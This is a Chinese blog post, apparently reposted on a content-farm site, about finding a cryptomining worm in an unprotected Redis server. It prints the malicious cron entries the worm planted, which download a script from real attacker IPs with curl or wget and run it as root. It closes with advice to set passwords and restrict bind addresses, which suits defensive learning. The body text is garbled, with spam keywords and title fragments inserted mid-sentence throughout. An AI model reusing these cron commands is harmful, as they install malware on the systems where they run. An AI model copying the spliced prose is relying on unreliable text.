您现在的位置是:网络安全 >>正文
事实证明,互联网会惩罚每一个裸奔的人之 Redis 扩散病毒
网络安全9人已围观
简介前段时间换了台电脑,一大堆开发环境我实在是懒得在本地搞了,每次启动来启动去太麻烦了,索性直接在服务器上开 Docker 部署,docker pull复制粘贴什么 Redis、什么 MySQL 分分钟装 ...
前段时间换了台电脑 ,事实证明一大堆开发环境我实在是互联懒得在本地搞了 ,每次启动来启动去太麻烦了,惩罚索性直接在服务器上开 Docker 部署,裸奔docker pull 复制粘贴什么 Redis、扩散什么 MySQL 分分钟装好,病毒要用的事实证明时候直接远程连接就行了,简直不要太方便 。互联
也不是惩罚什么业务场景让我发现了这么一个病毒 ,服务器租用因为大部分 Redis Key 都是裸奔设置了过期时间的 ,开发过程也没感觉到什么问题,扩散纯粹是病毒有一天我闲着没事干 ,进入 Redis 命令行 keys * 看看,事实证明不看不要紧,互联一看好家伙,惩罚多出了几个 key,大概就是免费模板下面这样子 :
复制uid:1 uid:2 uid:3 backup1 backup2 backup3 backup41.2.3.4.5.6.7.多出了 4 个 backup 前缀的 key ,我第一反应这肯定是什么备份文件
正常情况下我根本不会在意,纯粹就是那天确实比较闲,不如来学习下 Redis 吧(哈哈) ,于是,禀着好学的基本素养 ,源码下载我分别查看了下这里面的 value 是什么 :
复制*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh */5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh1.2.3.4.5.6.7.wget 是用来下载东西的 ,curl 是用于执行 HTTP 请求,点开 http://45.83.123.29/cleanfda/init.sh 看看到底是什么脚本文件 :

又是改权限 ,又是建站模板关防火墙删文件的,用屁股想都知道这 IP 肯定是国外的了 :

查了下发现这是一种 Redis 扩散病毒 ,专门利用 Redis 未授权访问漏洞的挖矿病毒 。没错 ,就是 Redis 没设置密码 ,亿华云没授权 ,让病毒有了可乘之机。如果服务暴露在互联网上就一定要设置密码 ,不要裸奔 😭,很多同学大部分时间都是在本地开发 ,没有设置密码的习惯或者只是简单的设置成 root 这种
另外,除了设置密码,模板下载服务器开放端口的时候最好也指定下 IP,不然默认的 0.0.0.0:6379 任何 IP 都可以访问
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“商站动力”。http://www.noorid.com/news/968b899023.html
上一篇:如何防止家庭安全摄像头被黑客入侵
下一篇:企业补丁管理必备的11个关键步骤
相关文章
DDoS攻击引发云服务提供商索要10.4万美元账单
网络安全Cybernews网站消息,Reddit某用户在遭受网络攻击后,Netlify向他的简单静态网站开具了一张10.4万美元的账单。最初收到这个账单,该用户还以为是在开玩笑,与Netlify公司客服沟通后 ...
【网络安全】
阅读更多如何选择保护密码?
网络安全为什么需要强密码?我们可能每天都使用个人识别码 (PIN)、密码或口令。从 ATM 取钱或在商店使用借记卡,到登录电子邮件或在线零售商。跟踪所有数字、字母和单词组合可能令人沮丧,但这些保护措施很重要, ...
【网络安全】
阅读更多Gartner:2023年全球安全与风险管理支出将增长11.3%
网络安全10月17日消息,日前,Gartner发布了影响安全支出增长的三个因素。这三个因素分别是:远程和混合办公模式的增加、从虚拟专用网络(VPN)向零信任网络访问(ZTNA)的过渡以及向云端交付模式的转变。 ...
【网络安全】
阅读更多
热门文章
最新文章
友情链接
- 多款热门 Chrome 扩展程序存在明文传输风险,用户隐私安全受威胁
- 将安全内建于开发流程中:威胁应对分步指南(Build Security In) - 上
- Windows WebDAV 零日远程代码执行漏洞遭野外利用
- 神舟战神笔记本电脑质量如何?(探索神舟战神笔记本电脑的品质与性能)
- 苹果6s搭载iOS10.3.1
- DellInspiron5548(一款超值的笔记本电脑选择)
- 神舟战神K540D-i7D2笔记本电脑的性能和用户体验(一款高性能笔记本电脑的推荐及评测)
- 解决WiFi已连接但无法上网的问题(探索WiFi连接问题背后的原因及有效解决方案)
- 微软联合执法机构捣毁全球 Lumma 窃密软件网络
- 身份安全成焦点:Palo Alto Networks拟以250亿美元收购CyberArk 亿华云云服务器企业服务器网站建设b2b信息平台香港物理机源码库